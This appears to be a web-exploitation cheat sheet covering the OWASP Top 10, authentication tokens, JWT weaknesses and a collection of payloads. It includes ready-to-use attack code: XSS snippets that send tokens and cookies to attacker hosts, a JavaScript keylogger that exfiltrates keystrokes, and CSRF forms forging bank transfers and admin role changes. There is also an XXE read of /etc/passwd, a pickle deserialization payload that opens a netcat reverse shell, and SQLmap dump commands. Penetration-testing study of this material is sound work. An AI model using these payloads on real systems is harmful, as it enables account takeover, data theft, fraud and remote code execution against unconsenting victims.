Web exploitation cannot happen without proxying and advanced tools such as.
- Burp Suite
- Not open-source, but it offers a free community edition [Link].
- OpenVAS
- Free and open-source [Link].
It is fundamental to master all OWASP TOP 10 vulnerabilities.
- A01:2021 – Broken Access Control
- Incorrectly implemented authentication and session management calls.
- A02:2021 – Cryptographic Failures
- Fail to protect the data in transit and at rest. Example: plan text passwords, do not use SSL…
- A03:2021 – Injection
- Insecure code to insert (or inject) as if it were part of the code of the program.
- A04:2021 – Insecure Design
- Missing or ineffective control in the design of the application.
- A05:2021 – Security Misconfiguration
- Misconfigured access controls, such as default credentials or empty passwords.
- A06:2021 – Vulnerable and Outdated Components
- When the software is vulnerable, unsupported, or out of date. Including the OS, dependencies…
- A07:2021 – Identification and Authentication Failures
- Fail to confirm the user’s identity, authentication, and session management.
- A08:2021 – Software and Data Integrity Failures
- Data integrity issues related to code or infrastructure. Violations caused by libraries from untrusted sources, CDNs…
- A09:2021 – Security Logging and Monitoring Failures
- Issues that fail to detect, escalate, and respond to active breaches.
- A10:2021 – Server-Side Request Forgery (SSRF)
- Flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL.
AUTHENTICATION
- Basic Auth
-
Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
- Where
dXNlcm5hbWU6cGFzc3dvcmQ=isusername:passwordencoded in Base64.
-
- Session Token
-
Authorization: Bearer 68e8c01795215bc01492faf3403a400c
- Where
68e8c01795215bc01492faf3403a400cis just an opaque, randomly generated hash stored. - It requires a server-side look-up for each request (local storage or database), where it can be revoked if compromised.
-
- JWT
-
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30
- The token can be divided into three parts:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9is the header,eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0is the payload,KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30is the signature.- The signature makes it self-sufficient, meaning the server can verify it autonomously and accept it within the expiration period (not revokeable).
- The header defines how the header+payload are signed. Typically, HS256 (symmetric) or RS256 (asymmetric).
- Common mistakes are not checking the signature (set to
"alg": "none", and optionally, remove the signature entirely). - If the server-side key is exposed, try to force HS256 and sign the token with the symmetric key.
- Common mistakes are not checking the signature (set to
-
On the client-side, the authentication is typically stored using the following methods.
- Local Storage
- It can be seen by any script running on the page.
- Susceptible to XSS attacks:
-
fetch(`https://attacker.com/steal?data=${localStorage.getItem('token')}`); -
new Image().src = `https://attacker.com/log?token=${localStorage.getItem('auth_token')}`; -
location.replace(`https://attacker.com/collect?token=${localStorage.getItem('session')}`);
-
- HTTP-Only
- The token is stored at the browser level, and JavaScript cannot see it.
- Cookie
- When
samesite=none, the browser will send the cookie on any request the page makes, including to other origins. - Susceptible to CSFR attacks:
- Reflected
- It is delivered to the victim through an external link, a spoofed website, or a malicious email.
- The malicious website contains a hidden code that makes a call to the vulnerable website on behalf of the user.
- If the user is already authenticated on the vulnerable site, the browser will send a valid session token.
-
<img src="https://bank.com/transfer?amount=10000&to=AttackerID" width="0" height="0" />
-
<form id="steal" action="https://bank.com/transfer" method="POST"> <input type="hidden" name="amount" value="10000" /> <input type="hidden" name="to" value="AttackerID" /> </form><script>document.getElementById('steal').submit();</script>
- Stored / DOM-Based
- The malicious code, typically a JavaScript or an HTML, is Stored (persistently) in the vulnerable website that does not properly sanitize/validate users’ inputs (e.g, posts, messages).
- Any user who views the infected page (like a forum thread, a profile, or a support ticket) will unknowingly execute the attack.
- Because the request originates from the same domain as the vulnerable site, it is highly effective at bypassing browser security settings and is often harder for users to detect.
- The difference between DOM-Based and stored is that it happens on the live rendering of the site, but it has the same impact and capability.
-
<img src="https://vulnerable-site.com/api/delete-account" width="0" height="0" />
-
<script> fetch('https://vulnerable-site.com/api/update-role', { headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, method: 'POST', body: 'user_id=attacker_id&role=admin', credentials: 'include' }); </script>
- Reflected
- Some attacks can be prevented with
samesite=strict, but not all.
- When
MORE PAYLOADS
- XXE (XML eXternal Entity attack)
<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>
- XSS (possible in JavaScript, VBScript, Flash, and CSS)
It is worth mentioning the popular sources of payloads: PayLoadBox [Link], XSS-Payloads [Link].
Quick test for a low-hanging fruit:
<script>alert(1)</script>
<image src="javascript:alert(1)">
<body oninput=javascript:alert(1)><input autofocus>
<img \x00src=x onerror="alert(1)">
A payload for stealing Cookies:
<script>document.location='http://ip:port/?='+document.cookie;</script>
A very simple key logger:
<script>
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'https://attackerAddress/kl.php?c='+keys;
keys = '';
}, 1000);
</script>
- Insecure DeSerialization (the output of the following script is the payload)
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ' '/bin/sh -i 2>&1 | netcat 10.10.10.10 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))
INJECTION
- SQLmap – SQL injection and database takeover [Link]:
sqlmap -r requestFile sqlmap -r requestFile --dump
Note: the requestFile contains the HTTP request that SQLmap will use to perform iterations of injections.
See more usage and examples of SQLmap in the other post [Link].
MORE ON JWT
<HEADER>.<BODY>.<SIGNATURE>
Online handy tools [Link] and [Link].
- Header
alg(Algorithm)ES256Elliptic Curve (asymmetric).RS256RSA with SHA-256 (asymmetric).HS256HMAC with SHA-256 (symmetric).- more
typ(Type)JWTJSON Web Token. Default value.JWSJSON Web Signature, which is a signed JSON.JWEJSON Web Encryption, which is an encrypted JSON.
kid(Key ID)- It identifies the key used to sign the JWT.
jku(JWK set URL)- Contains the URL to the public key in a JWK Set Jason format as an array of
keys. - Most popular: RSA
use(intended Use) =sign(Modulus) =Eq4...x3JjcHwe(Exponent) =AQABalg(Algorithm) =RS256
- Most secure: EC
crv(Curve) =P-256x(Coordinate in Base64) =Usdf...Tou87FsyCoordinate in Base64) =x9KJjo...MJ89xalg(Algorithm) =ES256
- Contains the URL to the public key in a JWK Set Jason format as an array of
- Payload
- Anything in a JSON format.
- Signature
- It is a hash look-alike generated by applying a cryptographic function to a combination of the header and the payload.